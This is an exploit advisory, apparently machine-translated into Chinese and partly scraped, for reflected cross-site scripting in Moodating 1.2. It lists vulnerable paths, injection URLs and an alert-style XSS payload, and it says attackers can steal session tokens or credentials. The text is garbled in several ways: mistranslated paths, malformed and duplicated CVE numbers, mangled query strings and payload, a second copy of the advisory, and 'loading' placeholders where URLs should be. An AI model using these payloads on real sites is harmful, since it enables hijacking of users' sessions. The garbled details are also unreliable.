#利用标题: Moadating 1.2-反射的跨站点脚本(XSS)
#利用作者:饼干又名(Skalvin)
#日期: 22/07/2023
#vendor:穆斯社会
#供应商homepage: https://moodatingscript.com/
#软件link: https://demo.moodatingscript.com/home
#版本: 1.2
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-3849,CVE-2023-3848,CVE-2023-3847,CVE-2023-3846,CVE-2023-3843,CVE-2023-3843,CVE-2023-3845,CVE-2023-3844445
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /MATTMAKING /问题
URL参数容易受到RXSS的影响
路径: /朋友
URL参数容易受到RXSS的影响
https://website/friends [xss]/ajax_invite?mode=模型
PATH: /friends /ajax_invite
URL参数容易受到RXSS的影响
https://website/friends/ajax_invite [xss]?mode=模型
PATH: /页面
URL参数容易受到RXSS的影响
https://website/pagesi3efi%22%3E%3CIMG%20SRC%3DA%20onError%3DALERT(1)%3EBDK84/no-Permission-lole?ac cess_token=redirect_url=ahr0chm6ly9kzw1vlm1vb2rhdgluz3njcmmlwdc5jb20vb20vbwvldf9tzs9pbmrlec9tzwv0x21l
https://website/pages [xss]/no-permission-orole?access_token=redirect_url=ahr0chm6ly9kzw1vlm1vlm1vb2rhdgluz3njcmmmlwdc5jbmmmlwdc5jb20vb20vb20vbwvbwvldf9tzs9pbmrrec9tzwv0tzwv0x21212121212121
PATH: /用户
URL参数容易受到RXSS的影响
https://website/user [xss]/view/108?tab=活动
PATH: /用户/查看
URL参数容易受到RXSS的影响
https://website/users/view [xss]/108?tab=活动
PATH: /FIND-A匹配
URL参数容易受到RXSS的影响
https://website/find-a-match [xss]?session_popularity=ivey=0show_search_form=1gender=1gender=2from_age=18to_age=18to_age=45country_id=1State_id=1state_id=5city_id=5city_id=advatsion=0
[XSS有效载荷] : pksyk'img src=a oneerror=arter(1)s9a6
[-] 完毕
#利用作者:饼干又名(Skalvin)
#日期: 22/07/2023
#vendor:穆斯社会
#供应商homepage: https://moodatingscript.com/
#软件link: https://demo.moodatingscript.com/home
#版本: 1.2
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
#CVE: CVE-2023-3849,CVE-2023-3848,CVE-2023-3847,CVE-2023-3846,CVE-2023-3843,CVE-2023-3843,CVE-2023-3845,CVE-2023-3844445
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /MATTMAKING /问题
URL参数容易受到RXSS的影响
正在加载...
website
正在加载...
website
URL参数容易受到RXSS的影响
正在加载...
website
PATH: /friends /ajax_invite
URL参数容易受到RXSS的影响
正在加载...
website
PATH: /页面
URL参数容易受到RXSS的影响
https://website/pagesi3efi%22%3E%3CIMG%20SRC%3DA%20onError%3DALERT(1)%3EBDK84/no-Permission-lole?ac cess_token=redirect_url=ahr0chm6ly9kzw1vlm1vb2rhdgluz3njcmmlwdc5jb20vb20vbwvldf9tzs9pbmrlec9tzwv0x21l
https://website/pages [xss]/no-permission-orole?access_token=redirect_url=ahr0chm6ly9kzw1vlm1vlm1vb2rhdgluz3njcmmmlwdc5jbmmmlwdc5jb20vb20vb20vbwvbwvldf9tzs9pbmrrec9tzwv0tzwv0x21212121212121
PATH: /用户
URL参数容易受到RXSS的影响
正在加载...
website
PATH: /用户/查看
URL参数容易受到RXSS的影响
正在加载...
website
PATH: /FIND-A匹配
URL参数容易受到RXSS的影响
正在加载...
website
[XSS有效载荷] : pksyk'img src=a oneerror=arter(1)s9a6
[-] 完毕